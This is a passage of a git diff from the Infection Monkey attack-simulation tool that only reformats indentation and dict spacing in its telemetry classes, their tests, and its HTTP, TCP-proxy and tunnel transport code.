+++ b/monkey/infection_monkey/telemetry/attack/t1064_telem.py
@@ -3,7 +3,8 @@ from infection_monkey.telemetry.attack.usage_telem import AttackTelem
class T1064Telem(AttackTelem):
def __init__(self, status, usage):
- # TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem techniques
+ # TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem
+ # techniques
"""
T1064 telemetry.
:param status: ScanStatus of technique
@@ -14,5 +15,5 @@ class T1064Telem(AttackTelem):
def get_data(self):
data = super(T1064Telem, self).get_data()
- data.update({"usage": self.usage})
+ data.update({"usage": self.usage})
return data
diff --git a/monkey/infection_monkey/telemetry/attack/t1105_telem.py b/monkey/infection_monkey/telemetry/attack/t1105_telem.py
index 939e2b3e2..d75a527d9 100644
--- a/monkey/infection_monkey/telemetry/attack/t1105_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/t1105_telem.py
@@ -17,5 +17,5 @@ class T1105Telem(AttackTelem):
def get_data(self):
data = super(T1105Telem, self).get_data()
- data.update({"filename": self.filename, "src": self.src, "dst": self.dst})
+ data.update({"filename": self.filename, "src": self.src, "dst": self.dst})
return data
diff --git a/monkey/infection_monkey/telemetry/attack/t1107_telem.py b/monkey/infection_monkey/telemetry/attack/t1107_telem.py
index 816488f3b..ced66a4c1 100644
--- a/monkey/infection_monkey/telemetry/attack/t1107_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/t1107_telem.py
@@ -13,5 +13,5 @@ class T1107Telem(AttackTelem):
def get_data(self):
data = super(T1107Telem, self).get_data()
- data.update({"path": self.path})
+ data.update({"path": self.path})
return data
diff --git a/monkey/infection_monkey/telemetry/attack/t1197_telem.py b/monkey/infection_monkey/telemetry/attack/t1197_telem.py
index c5c98a9d0..5e12fc718 100644
--- a/monkey/infection_monkey/telemetry/attack/t1197_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/t1197_telem.py
@@ -5,7 +5,8 @@ __author__ = "itay.mizeretz"
class T1197Telem(VictimHostTelem):
def __init__(self, status, machine, usage):
- # TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem techniques
+ # TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem
+ # techniques
"""
T1197 telemetry.
:param status: ScanStatus of technique
@@ -17,5 +18,5 @@ class T1197Telem(VictimHostTelem):
def get_data(self):
data = super(T1197Telem, self).get_data()
- data.update({"usage": self.usage})
+ data.update({"usage": self.usage})
return data
diff --git a/monkey/infection_monkey/telemetry/attack/t1222_telem.py b/monkey/infection_monkey/telemetry/attack/t1222_telem.py
index 30a0314ae..4f65d1401 100644
--- a/monkey/infection_monkey/telemetry/attack/t1222_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/t1222_telem.py
@@ -14,5 +14,5 @@ class T1222Telem(VictimHostTelem):
def get_data(self):
data = super(T1222Telem, self).get_data()
- data.update({"command": self.command})
+ data.update({"command": self.command})
return data
diff --git a/monkey/infection_monkey/telemetry/attack/usage_telem.py b/monkey/infection_monkey/telemetry/attack/usage_telem.py
index 3066fe3d3..1231215e5 100644
--- a/monkey/infection_monkey/telemetry/attack/usage_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/usage_telem.py
@@ -13,5 +13,5 @@ class UsageTelem(AttackTelem):
def get_data(self):
data = super(UsageTelem, self).get_data()
- data.update({"usage": self.usage})
+ data.update({"usage": self.usage})
return data
diff --git a/monkey/infection_monkey/telemetry/attack/victim_host_telem.py b/monkey/infection_monkey/telemetry/attack/victim_host_telem.py
index 9dc812b14..19c3740ff 100644
--- a/monkey/infection_monkey/telemetry/attack/victim_host_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/victim_host_telem.py
@@ -13,9 +13,9 @@ class VictimHostTelem(AttackTelem):
:param machine: VictimHost obj from model/host.py
"""
super(VictimHostTelem, self).__init__(technique, status)
- self.machine = {"domain_name": machine.domain_name, "ip_addr": machine.ip_addr}
+ self.machine = {"domain_name": machine.domain_name, "ip_addr": machine.ip_addr}
def get_data(self):
data = super(VictimHostTelem, self).get_data()
- data.update({"machine": self.machine})
+ data.update({"machine": self.machine})
return data
diff --git a/monkey/infection_monkey/telemetry/base_telem.py b/monkey/infection_monkey/telemetry/base_telem.py
index e179a24df..0fcf4b203 100644
--- a/monkey/infection_monkey/telemetry/base_telem.py
+++ b/monkey/infection_monkey/telemetry/base_telem.py
@@ -9,6 +9,7 @@ LOGGED_DATA_LENGTH = 300 # How many characters of telemetry data will be logged
__author__ = "itay.mizeretz"
+
# TODO: Rework the interface for telemetry; this class has too many responsibilities
# (i.e. too many reasons to change):
#
diff --git a/monkey/infection_monkey/telemetry/exploit_telem.py b/monkey/infection_monkey/telemetry/exploit_telem.py
index 4f39a2145..9b2e6c2f6 100644
--- a/monkey/infection_monkey/telemetry/exploit_telem.py
+++ b/monkey/infection_monkey/telemetry/exploit_telem.py
@@ -19,9 +19,9 @@ class ExploitTelem(BaseTelem):
def get_data(self):
return {
- "result": self.result,
- "machine": self.exploiter.host.__dict__,
- "exploiter": self.exploiter.__class__.__name__,
- "info": self.exploiter.exploit_info,
- "attempts": self.exploiter.exploit_attempts,
+ "result": self.result,
+ "machine": self.exploiter.host.__dict__,
+ "exploiter": self.exploiter.__class__.__name__,
+ "info": self.exploiter.exploit_info,
+ "attempts": self.exploiter.exploit_attempts,
}
diff --git a/monkey/infection_monkey/telemetry/post_breach_telem.py b/monkey/infection_monkey/telemetry/post_breach_telem.py
index 6dafa3c0c..f1e8f6101 100644
--- a/monkey/infection_monkey/telemetry/post_breach_telem.py
+++ b/monkey/infection_monkey/telemetry/post_breach_telem.py
@@ -22,11 +22,11 @@ class PostBreachTelem(BaseTelem):
def get_data(self):
return {
- "command": self.pba.command,
- "result": self.result,
- "name": self.pba.name,
- "hostname": self.hostname,
- "ip": self.ip,
+ "command": self.pba.command,
+ "result": self.result,
+ "name": self.pba.name,
+ "hostname": self.hostname,
+ "ip": self.ip,
}
@staticmethod
diff --git a/monkey/infection_monkey/telemetry/scan_telem.py b/monkey/infection_monkey/telemetry/scan_telem.py
index c606a2cc2..ea7ee8723 100644
--- a/monkey/infection_monkey/telemetry/scan_telem.py
+++ b/monkey/infection_monkey/telemetry/scan_telem.py
@@ -16,4 +16,4 @@ class ScanTelem(BaseTelem):
telem_category = TelemCategoryEnum.SCAN
def get_data(self):
- return {"machine": self.machine.as_dict(), "service_count": len(self.machine.services)}
+ return {"machine": self.machine.as_dict(), "service_count": len(self.machine.services)}
diff --git a/monkey/infection_monkey/telemetry/scoutsuite_telem.py b/monkey/infection_monkey/telemetry/scoutsuite_telem.py
index 91b26f69d..7a31b8332 100644
--- a/monkey/infection_monkey/telemetry/scoutsuite_telem.py
+++ b/monkey/infection_monkey/telemetry/scoutsuite_telem.py
@@ -14,4 +14,4 @@ class ScoutSuiteTelem(BaseTelem):
telem_category = TelemCategoryEnum.SCOUTSUITE
def get_data(self):
- return {"data": self.provider_data}
+ return {"data": self.provider_data}
diff --git a/monkey/infection_monkey/telemetry/state_telem.py b/monkey/infection_monkey/telemetry/state_telem.py
index 06fc1794c..a5b8ad66a 100644
--- a/monkey/infection_monkey/telemetry/state_telem.py
+++ b/monkey/infection_monkey/telemetry/state_telem.py
@@ -17,4 +17,4 @@ class StateTelem(BaseTelem):
telem_category = TelemCategoryEnum.STATE
def get_data(self):
- return {"done": self.is_done, "version": self.version}
+ return {"done": self.is_done, "version": self.version}
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_attack_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_attack_telem.py
index 02d591f3e..1025ae871 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_attack_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_attack_telem.py
@@ -16,7 +16,7 @@ def attack_telem_test_instance():
def test_attack_telem_send(attack_telem_test_instance, spy_send_telemetry):
attack_telem_test_instance.send()
- expected_data = {"status": STATUS.value, "technique": TECHNIQUE}
+ expected_data = {"status": STATUS.value, "technique": TECHNIQUE}
expected_data = json.dumps(expected_data, cls=attack_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1005_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1005_telem.py
index 7ad7e074c..9bcda631d 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1005_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1005_telem.py
@@ -18,10 +18,10 @@ def T1005_telem_test_instance():
def test_T1005_send(T1005_telem_test_instance, spy_send_telemetry):
T1005_telem_test_instance.send()
expected_data = {
- "status": STATUS.value,
- "technique": "T1005",
- "gathered_data_type": GATHERED_DATA_TYPE,
- "info": INFO,
+ "status": STATUS.value,
+ "technique": "T1005",
+ "gathered_data_type": GATHERED_DATA_TYPE,
+ "info": INFO,
}
expected_data = json.dumps(expected_data, cls=T1005_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1035_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1035_telem.py
index f927e7b91..3e91417a4 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1035_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1035_telem.py
@@ -16,7 +16,7 @@ def T1035_telem_test_instance():
def test_T1035_send(T1035_telem_test_instance, spy_send_telemetry):
T1035_telem_test_instance.send()
- expected_data = {"status": STATUS.value, "technique": "T1035", "usage": USAGE.name}
+ expected_data = {"status": STATUS.value, "technique": "T1035", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1035_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1064_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1064_telem.py
index 1d242d4ef..afcae8fce 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1064_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1064_telem.py
@@ -16,7 +16,7 @@ def T1064_telem_test_instance():
def test_T1064_send(T1064_telem_test_instance, spy_send_telemetry):
T1064_telem_test_instance.send()
- expected_data = {"status": STATUS.value, "technique": "T1064", "usage": USAGE_STR}
+ expected_data = {"status": STATUS.value, "technique": "T1064", "usage": USAGE_STR}
expected_data = json.dumps(expected_data, cls=T1064_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1105_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1105_telem.py
index 690c4508c..52c512aa2 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1105_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1105_telem.py
@@ -19,11 +19,11 @@ def T1105_telem_test_instance():
def test_T1105_send(T1105_telem_test_instance, spy_send_telemetry):
T1105_telem_test_instance.send()
expected_data = {
- "status": STATUS.value,
- "technique": "T1105",
- "filename": FILENAME,
- "src": SRC_IP,
- "dst": DST_IP,
+ "status": STATUS.value,
+ "technique": "T1105",
+ "filename": FILENAME,
+ "src": SRC_IP,
+ "dst": DST_IP,
}
expected_data = json.dumps(expected_data, cls=T1105_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1106_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1106_telem.py
index 2857bbc11..31640666a 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1106_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1106_telem.py
@@ -16,7 +16,7 @@ def T1106_telem_test_instance():
def test_T1106_send(T1106_telem_test_instance, spy_send_telemetry):
T1106_telem_test_instance.send()
- expected_data = {"status": STATUS.value, "technique": "T1106", "usage": USAGE.name}
+ expected_data = {"status": STATUS.value, "technique": "T1106", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1106_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1107_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1107_telem.py
index bb1bf2088..2729ed659 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1107_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1107_telem.py
@@ -16,7 +16,7 @@ def T1107_telem_test_instance():
def test_T1107_send(T1107_telem_test_instance, spy_send_telemetry):
T1107_telem_test_instance.send()
- expected_data = {"status": STATUS.value, "technique": "T1107", "path": PATH}
+ expected_data = {"status": STATUS.value, "technique": "T1107", "path": PATH}
expected_data = json.dumps(expected_data, cls=T1107_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1129_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1129_telem.py
index 41178a749..0818ed195 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1129_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1129_telem.py
@@ -16,7 +16,7 @@ def T1129_telem_test_instance():
def test_T1129_send(T1129_telem_test_instance, spy_send_telemetry):
T1129_telem_test_instance.send()
- expected_data = {"status": STATUS.value, "technique": "T1129", "usage": USAGE.name}
+ expected_data = {"status": STATUS.value, "technique": "T1129", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1129_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1197_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1197_telem.py
index a7556e952..bdf3b9e73 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1197_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1197_telem.py
@@ -21,10 +21,10 @@ def T1197_telem_test_instance():
def test_T1197_send(T1197_telem_test_instance, spy_send_telemetry):
T1197_telem_test_instance.send()
expected_data = {
- "status": STATUS.value,
- "technique": "T1197",
- "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
- "usage": USAGE_STR,
+ "status": STATUS.value,
+ "technique": "T1197",
+ "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
+ "usage": USAGE_STR,
}
expected_data = json.dumps(expected_data, cls=T1197_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_t1222_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_t1222_telem.py
index 1b78bef5b..62724f916 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_t1222_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_t1222_telem.py
@@ -21,10 +21,10 @@ def T1222_telem_test_instance():
def test_T1222_send(T1222_telem_test_instance, spy_send_telemetry):
T1222_telem_test_instance.send()
expected_data = {
- "status": STATUS.value,
- "technique": "T1222",
- "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
- "command": COMMAND,
+ "status":STATUS.value,
+ "technique":"T1222",
+ "machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP},
+ "command":COMMAND,
}
expected_data = json.dumps(expected_data, cls=T1222_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_usage_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_usage_telem.py
index 511cc51b8..97e0dc801 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_usage_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_usage_telem.py
@@ -18,9 +18,9 @@ def usage_telem_test_instance():
def test_usage_telem_send(usage_telem_test_instance, spy_send_telemetry):
usage_telem_test_instance.send()
expected_data = {
- "status": STATUS.value,
- "technique": TECHNIQUE,
- "usage": USAGE.name,
+ "status":STATUS.value,
+ "technique":TECHNIQUE,
+ "usage":USAGE.name,
}
expected_data = json.dumps(expected_data, cls=usage_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py b/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py
index a3853e78c..0344c6478 100644
--- a/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/attack/test_victim_host_telem.py
@@ -21,9 +21,9 @@ def victim_host_telem_test_instance():
def test_victim_host_telem_send(victim_host_telem_test_instance, spy_send_telemetry):
victim_host_telem_test_instance.send()
expected_data = {
- "status": STATUS.value,
- "technique": TECHNIQUE,
- "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
+ "status":STATUS.value,
+ "technique":TECHNIQUE,
+ "machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP},
}
expected_data = json.dumps(expected_data, cls=victim_host_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/test_exploit_telem.py b/monkey/infection_monkey/telemetry/tests/test_exploit_telem.py
index 95f853922..373dece4a 100644
--- a/monkey/infection_monkey/telemetry/tests/test_exploit_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/test_exploit_telem.py
@@ -10,24 +10,24 @@ DOMAIN_NAME = "domain-name"
IP = "0.0.0.0"
HOST = VictimHost(IP, DOMAIN_NAME)
HOST_AS_DICT = {
- "ip_addr": IP,
- "domain_name": DOMAIN_NAME,
- "os": {},
- "services": {},
- "icmp": False,
- "monkey_exe": None,
- "default_tunnel": None,
- "default_server": None,
+ "ip_addr":IP,
+ "domain_name":DOMAIN_NAME,
+ "os":{},
+ "services":{},
+ "icmp":False,
+ "monkey_exe":None,
+ "default_tunnel":None,
+ "default_server":None,
}
EXPLOITER = WmiExploiter(HOST)
EXPLOITER_NAME = "WmiExploiter"
EXPLOITER_INFO = {
- "display_name": WmiExploiter._EXPLOITED_SERVICE,
- "started": "",
- "finished": "",
- "vulnerable_urls": [],
- "vulnerable_ports": [],
- "executed_cmds": [],
+ "display_name":WmiExploiter._EXPLOITED_SERVICE,
+ "started":"",
+ "finished":"",
+ "vulnerable_urls":[],
+ "vulnerable_ports":[],
+ "executed_cmds":[],
}
EXPLOITER_ATTEMPTS = []
RESULT = False
@@ -41,11 +41,11 @@ def exploit_telem_test_instance():
def test_exploit_telem_send(exploit_telem_test_instance, spy_send_telemetry):
exploit_telem_test_instance.send()
expected_data = {
- "result": RESULT,
- "machine": HOST_AS_DICT,
- "exploiter": EXPLOITER_NAME,
- "info": EXPLOITER_INFO,
- "attempts": EXPLOITER_ATTEMPTS,
+ "result":RESULT,
+ "machine":HOST_AS_DICT,
+ "exploiter":EXPLOITER_NAME,
+ "info":EXPLOITER_INFO,
+ "attempts":EXPLOITER_ATTEMPTS,
}
expected_data = json.dumps(expected_data, cls=exploit_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/test_post_breach_telem.py b/monkey/infection_monkey/telemetry/tests/test_post_breach_telem.py
index d6ce48825..3a6d1b31d 100644
--- a/monkey/infection_monkey/telemetry/tests/test_post_breach_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/test_post_breach_telem.py
@@ -20,18 +20,18 @@ class StubSomePBA:
@pytest.fixture
def post_breach_telem_test_instance(monkeypatch):
PBA = StubSomePBA()
- monkeypatch.setattr(PostBreachTelem, "_get_hostname_and_ip", lambda: (HOSTNAME, IP))
+ monkeypatch.setattr(PostBreachTelem, "_get_hostname_and_ip", lambda:(HOSTNAME, IP))
return PostBreachTelem(PBA, RESULT)
def test_post_breach_telem_send(post_breach_telem_test_instance, spy_send_telemetry):
post_breach_telem_test_instance.send()
expected_data = {
- "command": PBA_COMMAND,
- "result": RESULT,
- "name": PBA_NAME,
- "hostname": HOSTNAME,
- "ip": IP,
+ "command":PBA_COMMAND,
+ "result":RESULT,
+ "name":PBA_NAME,
+ "hostname":HOSTNAME,
+ "ip":IP,
}
expected_data = json.dumps(expected_data, cls=post_breach_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/test_scan_telem.py b/monkey/infection_monkey/telemetry/tests/test_scan_telem.py
index 07c6fbf41..ffb2dbf8b 100644
--- a/monkey/infection_monkey/telemetry/tests/test_scan_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/test_scan_telem.py
@@ -9,14 +9,14 @@ DOMAIN_NAME = "domain-name"
IP = "0.0.0.0"
HOST = VictimHost(IP, DOMAIN_NAME)
HOST_AS_DICT = {
- "ip_addr": IP,
- "domain_name": DOMAIN_NAME,
- "os": {},
- "services": {},
- "icmp": False,
- "monkey_exe": None,
- "default_tunnel": None,
- "default_server": None,
+ "ip_addr":IP,
+ "domain_name":DOMAIN_NAME,
+ "os":{},
+ "services":{},
+ "icmp":False,
+ "monkey_exe":None,
+ "default_tunnel":None,
+ "default_server":None,
}
HOST_SERVICES = {}
@@ -28,7 +28,7 @@ def scan_telem_test_instance():
def test_scan_telem_send(scan_telem_test_instance, spy_send_telemetry):
scan_telem_test_instance.send()
- expected_data = {"machine": HOST_AS_DICT, "service_count": len(HOST_SERVICES)}
+ expected_data = {"machine":HOST_AS_DICT, "service_count":len(HOST_SERVICES)}
expected_data = json.dumps(expected_data, cls=scan_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/test_state_telem.py b/monkey/infection_monkey/telemetry/tests/test_state_telem.py
index 18776f987..fa67301e2 100644
--- a/monkey/infection_monkey/telemetry/tests/test_state_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/test_state_telem.py
@@ -15,7 +15,7 @@ def state_telem_test_instance():
def test_state_telem_send(state_telem_test_instance, spy_send_telemetry):
state_telem_test_instance.send()
- expected_data = {"done": IS_DONE, "version": VERSION}
+ expected_data = {"done":IS_DONE, "version":VERSION}
expected_data = json.dumps(expected_data, cls=state_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/test_trace_telem.py b/monkey/infection_monkey/telemetry/tests/test_trace_telem.py
index 0c4027a05..c1f91e165 100644
--- a/monkey/infection_monkey/telemetry/tests/test_trace_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/test_trace_telem.py
@@ -14,7 +14,7 @@ def trace_telem_test_instance():
def test_trace_telem_send(trace_telem_test_instance, spy_send_telemetry):
trace_telem_test_instance.send()
- expected_data = {"msg": MSG}
+ expected_data = {"msg":MSG}
expected_data = json.dumps(expected_data, cls=trace_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/tests/test_tunnel_telem.py b/monkey/infection_monkey/telemetry/tests/test_tunnel_telem.py
index eab763790..a13a929ce 100644
--- a/monkey/infection_monkey/telemetry/tests/test_tunnel_telem.py
+++ b/monkey/infection_monkey/telemetry/tests/test_tunnel_telem.py
@@ -12,7 +12,7 @@ def tunnel_telem_test_instance():
def test_tunnel_telem_send(tunnel_telem_test_instance, spy_send_telemetry):
tunnel_telem_test_instance.send()
- expected_data = {"proxy": None}
+ expected_data = {"proxy":None}
expected_data = json.dumps(expected_data, cls=tunnel_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
diff --git a/monkey/infection_monkey/telemetry/trace_telem.py b/monkey/infection_monkey/telemetry/trace_telem.py
index 8beec1181..db59f0169 100644
--- a/monkey/infection_monkey/telemetry/trace_telem.py
+++ b/monkey/infection_monkey/telemetry/trace_telem.py
@@ -21,4 +21,4 @@ class TraceTelem(BaseTelem):
telem_category = TelemCategoryEnum.TRACE
def get_data(self):
- return {"msg": self.msg}
+ return {"msg":self.msg}
diff --git a/monkey/infection_monkey/telemetry/tunnel_telem.py b/monkey/infection_monkey/telemetry/tunnel_telem.py
index 05f057ee9..45ef0b176 100644
--- a/monkey/infection_monkey/telemetry/tunnel_telem.py
+++ b/monkey/infection_monkey/telemetry/tunnel_telem.py
@@ -16,4 +16,4 @@ class TunnelTelem(BaseTelem):
telem_category = TelemCategoryEnum.TUNNEL
def get_data(self):
- return {"proxy": self.proxy}
+ return {"proxy":self.proxy}
diff --git a/monkey/infection_monkey/transport/http.py b/monkey/infection_monkey/transport/http.py
index e2b3a69da..d33acfc0a 100644
--- a/monkey/infection_monkey/transport/http.py
+++ b/monkey/infection_monkey/transport/http.py
@@ -99,8 +99,8 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
self.send_header("Content-type", "application/octet-stream")
self.send_header(
- "Content-Range",
- "bytes " + str(start_range) + "-" + str(end_range - 1) + "/" + str(size),
+ "Content-Range",
+ "bytes " + str(start_range) + "-" + str(end_range - 1) + "/" + str(size),
)
self.send_header("Content-Length", min(end_range - start_range, size))
self.end_headers()
@@ -108,8 +108,8 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
def log_message(self, format_string, *args):
LOG.debug(
- "FileServHTTPRequestHandler: %s - - [%s] %s"
- % (self.address_string(), self.log_date_time_string(), format_string % args)
+ "FileServHTTPRequestHandler: %s - - [%s] %s"
+ % (self.address_string(), self.log_date_time_string(), format_string % args)
)
@@ -127,11 +127,11 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler):
try:
dest_path = self.path
r = requests.post(
- url=dest_path,
- data=post_data,
- verify=False,
- proxies=infection_monkey.control.ControlClient.proxies,
- timeout=SHORT_REQUEST_TIMEOUT,
+ url=dest_path,
+ data=post_data,
+ verify=False,
+ proxies=infection_monkey.control.ControlClient.proxies,
+ timeout=SHORT_REQUEST_TIMEOUT,
)
self.send_response(r.status_code)
except requests.exceptions.ConnectionError as e:
@@ -160,8 +160,8 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler):
conn = socket.create_connection(address)
except socket.error as e:
LOG.debug(
- "HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s"
- % (repr(address), e)
+ "HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s"
+ % (repr(address), e)
)
self.send_error(504) # 504 Gateway Timeout
return
@@ -187,8 +187,8 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler):
def log_message(self, format_string, *args):
LOG.debug(
- "HTTPConnectProxyHandler: %s - [%s] %s"
- % (self.address_string(), self.log_date_time_string(), format_string % args)
+ "HTTPConnectProxyHandler: %s - [%s] %s"
+ % (self.address_string(), self.log_date_time_string(), format_string % args)
)
@@ -213,10 +213,10 @@ class HTTPServer(threading.Thread):
def report_download(dest=None):
LOG.info("File downloaded from (%s,%s)" % (dest[0], dest[1]))
TempHandler.T1105Telem(
- TempHandler.ScanStatus.USED,
- get_interface_to_target(dest[0]),
- dest[0],
- self._filename,
+ TempHandler.ScanStatus.USED,
+ get_interface_to_target(dest[0]),
+ dest[0],
+ self._filename,
).send()
self.downloads += 1
if not self.downloads < self.max_downloads:
@@ -270,10 +270,10 @@ class LockedHTTPServer(threading.Thread):
def report_download(dest=None):
LOG.info("File downloaded from (%s,%s)" % (dest[0], dest[1]))
TempHandler.T1105Telem(
- TempHandler.ScanStatus.USED,
- get_interface_to_target(dest[0]),
- dest[0],
- self._filename,
+ TempHandler.ScanStatus.USED,
+ get_interface_to_target(dest[0]),
+ dest[0],
+ self._filename,
).send()
self.downloads += 1
if not self.downloads < self.max_downloads:
diff --git a/monkey/infection_monkey/transport/tcp.py b/monkey/infection_monkey/transport/tcp.py
index 60a995edc..6c79e5cd2 100644
--- a/monkey/infection_monkey/transport/tcp.py
+++ b/monkey/infection_monkey/transport/tcp.py
@@ -71,11 +71,11 @@ class TcpProxy(TransportProxyBase):
pipe = SocketsPipe(source, dest)
pipes.append(pipe)
LOG.debug(
- "piping sockets %s:%s->%s:%s",
- address[0],
- address[1],
- self.dest_host,
- self.dest_port,
+ "piping sockets %s:%s->%s:%s",
+ address[0],
+ address[1],
+ self.dest_host,
+ self.dest_port,
)
pipe.start()
diff --git a/monkey/infection_monkey/tunnel.py b/monkey/infection_monkey/tunnel.py
index 83e03fec2..ecfd313d7 100644
--- a/monkey/infection_monkey/tunnel.py
+++ b/monkey/infection_monkey/tunnel.py
@@ -27,9 +27,9 @@ def _set_multicast_socket(timeout=DEFAULT_TIMEOUT, adapter=""):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((adapter, MCAST_PORT))
sock.setsockopt(
- socket.IPPROTO_IP,
- socket.IP_ADD_MEMBERSHIP,
- struct.pack("4sl", socket.inet_aton(MCAST_GROUP), socket.INADDR_ANY),
+ socket.IPPROTO_IP,
+ socket.IP_ADD_MEMBERSHIP,
+ struct.pack("4sl", socket.inet_aton(MCAST_GROUP), socket.INADDR_ANY),
)
return sock
@@ -138,14 +138,14 @@ class MonkeyTunnel(Thread):
return
proxy = self._proxy_class(
- local_port=self.local_port, dest_host=self._target_addr, dest_port=self._target_port
+ local_port=self.local_port, dest_host=self._target_addr, dest_port=self._target_port
)
LOG.info(
- "Running tunnel using proxy class: %s, listening on port %s, routing to: %s:%s",
- proxy.__class__.__name__,
- self.local_port,
- self._target_addr,
- self._target_port,
+ "Running tunnel using proxy class: %s, listening on port %s, routing to: %s:%s",
+ proxy.__class__.__name__,
+ self.local_port,
+ self._target_addr,
+ self._target_port,
)
proxy.start()
@@ -157,7 +157,7 @@ class MonkeyTunnel(Thread):
if ip_match:
